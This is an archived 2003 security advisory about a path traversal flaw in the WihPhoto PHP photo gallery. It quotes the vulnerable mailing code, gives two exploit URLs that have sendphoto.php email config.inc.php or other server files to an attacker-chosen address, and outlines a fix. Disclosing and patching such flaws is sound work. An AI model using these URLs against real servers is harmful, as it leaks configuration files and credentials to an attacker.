Vulnwatch mailing list archives
WihPhoto (PHP)
From: "Frog Man" <leseulfrog () hotmail com>
Date: Sun, 23 Feb 2003 18:44:58 +0100
Informations :
°°°°°°°°°°°°°°
Version : 0.86-dev
Website : http://www.wihsy.com
Problem : All files from the hard disk can be sent by mail (that is, any file the web server process can read, since encode_file() only checks is_readable() before attaching).

PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
util/email.php :
------------------------------------------------------------------------
<? class CMailFile { var $subject; var $addr_to; var $text_body; var $text_encoded; var $mime_headers; var $mime_boundary = "--==================_846811060==_"; var $smtp_headers;function CMailFile($subject,$to,$from,$msg,$filename,$mimetype = "application/octet-stream", $mime_filename = false) {
$this->subject = $subject; $this->addr_to = $to; $this->smtp_headers = $this->write_smtpheaders($from); $this->text_body = $this->write_body($msg);$this->text_encoded = $this->attach_file($filename,$mimetype,$mime_filename);
$this->mime_headers = $this->write_mimeheaders($filename, $mime_filename); } function attach_file($filename,$mimetype,$mime_filename) { $encoded = $this->encode_file($filename); if ($mime_filename) $filename = $mime_filename; $out = "--" . $this->mime_boundary . "\n"; $out = $out . "Content-type: " . $mimetype . "; name=\"$filename\";\n"; $out = $out . "Content-Transfer-Encoding: base64\n";$out = $out . "Content-disposition: attachment; filename=\"$filename\"\n\n";
$out = $out . $encoded . "\n"; $out = $out . "--" . $this->mime_boundary . "--" . "\n"; return $out; // added -- to notify email client attachment is done } function encode_file($sourcefile) { if (is_readable($sourcefile)) { $fd = fopen($sourcefile, "r"); $contents = fread($fd, filesize($sourcefile)); $encoded = my_chunk_split(base64_encode($contents)); fclose($fd); } return $encoded; } function sendfile() { $headers = $this->smtp_headers . $this->mime_headers; $message = $this->text_body . $this->text_encoded; mail($this->addr_to,$this->subject,$message,$headers); } [...] function write_mimeheaders($filename, $mime_filename) { if ($mime_filename) $filename = $mime_filename; $out = "MIME-version: 1.0\n"; $out = $out . "Content-type: multipart/mixed; "; $out = $out . "boundary=\"$this->mime_boundary\"\n"; $out = $out . "Content-transfer-encoding: 7BIT\n"; $out = $out . "X-attachments: $filename;\n\n"; return $out; } [...] } [...] ------------------------------------------------------------------------ sendphoto.php : ------------------------------------------------------------------------ include("util/email.php"); include("config.inc.php"); [...] if (!$filled) { print "<FORM METHOD=POST ACTION=sendphoto.php>\n"; print "<INPUT TYPE=hidden NAME=filled VALUE=1>\n"; print "<INPUT TYPE=hidden NAME=pic VALUE=$pic>\n"; print "<INPUT TYPE=hidden NAME=album VALUE="; print rawurlencode($album); print ">\n"; print "<center><p>$sendphoto_send_photo_to<br>"; print "<INPUT NAME=sendto></input></center>\n"; print "<p>\n"; print "<center><INPUT TYPE=submit VALUE=\"$sendphoto_button\"></center>\n"; print "</form>\n"; print "</body></html>\n"; } else { $message = "$sendphoto_message"; $album1 = rawurldecode($album); $filetoattach = "./$pix_base/$album1/$pic"; $mimetype = "image/jpeg";$newmail = new CMailFile($subject,$sendto,$replyto,$message,$filetoattach,$mimetype);
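$newmail->sendfile(); print "$sendphoto_successful"; print "</body></html>\n"; } ?>
------------------------------------------------------------------------

Exploits :
°°°°°°°°°°
http://[target]/sendphoto.php?album=..&pic=config.inc.php
or
http://[target]/sendphoto.php?album=..&pic=config.inc.php&sendto=[E-MAIL]&filled=1
where [E-MAIL] is the mailbox where http://[target]/config.inc.php will be sent.
The cause is visible in sendphoto.php above: the request parameters album and pic are used unchecked to build $filetoattach ("./$pix_base/$album1/$pic"), so a value of ".." for album moves the path out of the photo directory, and the hard-coded image/jpeg MIME type does nothing to restrict which file is attached.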
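Patch :
°°°°°°°
A patch can be found on http://www.phpsecure.info .
Whatever patch is applied, the fix has to ensure that album and pic cannot contain path separators or "..", and that the resolved path of the attachment (for example as returned by realpath()) stays inside the $pix_base photo directory before the file is read and mailed.

More Details :
°°°°°°°°°°°°°°
In French : http://www.frog-man.org/tutos/WihPhoto.txt
Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FWihPhoto.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools

frog-m@n

_________________________________________________________________
MSN Messenger : discutez en direct avec vos amis ! http://messenger.fr.msn.be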